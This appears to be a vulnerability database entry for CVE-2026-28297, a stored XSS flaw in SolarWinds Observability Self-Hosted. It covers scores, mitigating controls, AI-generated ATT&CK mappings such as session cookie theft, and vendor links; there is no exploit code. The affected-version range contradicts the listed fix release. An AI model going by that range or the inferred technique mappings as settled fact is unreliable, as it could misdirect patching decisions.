CVE-2026-28297

Medium

Published: 26 March 2026

Published

26 March 2026

Modified

31 March 2026

KEV Added

—

Patch

—

CVSS Score 6.1 CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

EPSS Score 0.0003 9.2th percentile

Risk Priority 12 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-28297 is a medium-severity Cross-site Scripting (CWE-79) vulnerability in Solarwinds Observability Self-Hosted. Its CVSS base score is 6.1 (Medium).

Operationally, exploitation aligns with the MITRE ATT&CK technique Drive-by Compromise (T1189); ranked at the 9.2th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Threat & Defense at a Glance

What attackers do: exploitation maps to Drive-by Compromise (T1189) and 3 other techniques. What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-2 Flaw Remediation good match

prevent

Directly mitigates the stored XSS vulnerability by requiring timely remediation through vendor patching as specified in the SolarWinds advisory.

SI-10 Information Input Validation good match

prevent

Prevents injection of malicious scripts into stored data by validating all high-privilege user inputs before persistence in the self-hosted application.

SI-15 Information Output Filtering good match

prevent

Filters information outputs to encode or sanitize stored data, blocking execution of injected scripts in users' browsers.

MITRE ATT&CK Enterprise TechniquesAI

T1189 Drive-by Compromise Initial Access

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing.

attack.mitre.org →

T1210 Exploitation of Remote Services Lateral Movement

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network.

attack.mitre.org →

T1539 Steal Web Session Cookie Credential Access

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.

attack.mitre.org →

T1555.003 Credentials from Web Browsers Credential Access

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.

attack.mitre.org →

Why these techniques?

Stored XSS enables drive-by compromise via legitimate SolarWinds app (T1189), exploitation of remote web service (T1210), and injected scripts to steal web session cookies (T1539) or credentials from browsers (T1555.003).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

NVD Description

SolarWinds Observability Self-Hosted was found to be affected by a stored cross-site scripting vulnerability, which when exploited, can lead to unintended script execution.

Deeper analysisAI

CVE-2026-28297 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting SolarWinds Observability Self-Hosted. Published on 2026-03-26, it carries a CVSS v3.1 base score of 6.1 (AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N). When exploited, the vulnerability enables unintended script execution within the affected application.

The attack requires an attacker to have high privileges (PR:H) and access from an adjacent network (AV:A), with low attack complexity (AC:L) and no user interaction (UI:N). Successful exploitation grants high impacts on confidentiality (C:H) and integrity (I:H), allowing injected scripts to steal sensitive data or manipulate application functionality, while availability remains unaffected (A:N) and scope unchanged (S:U).

SolarWinds has addressed the issue in its security advisory at https://www.solarwinds.com/trust-center/security-advisories/CVE-2026-28297 and release notes for Hybrid Cloud Observability (HCO) 2026.1.1 at https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/hco_2026-1-1_release_notes.htm, which detail mitigation and patching instructions.

Details

CWE(s): CWE-79

Affected Products

solarwinds

observability self-hosted

≤ 2026.1.1

CVEs Like This One

CVE-2026-28298Same product: Solarwinds Observability Self-Hosted

CVE-2025-40549Same product class: network monitoring / SIEM

CVE-2025-40547Same product class: network monitoring / SIEM

CVE-2025-40551Same product class: network monitoring / SIEM

CVE-2025-40536Same product class: network monitoring / SIEM

CVE-2024-28988Same product class: network monitoring / SIEM

CVE-2025-40552Same product class: network monitoring / SIEM

CVE-2025-26399Same product class: network monitoring / SIEM

CVE-2025-40554Same product class: network monitoring / SIEM

CVE-2025-40537Same product class: network monitoring / SIEM

References

https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/hco_2026-1-1_release_notes.htm
Release Notes · psirt@solarwinds.com
https://www.solarwinds.com/trust-center/security-advisories/CVE-2026-28297
Vendor Advisory · psirt@solarwinds.com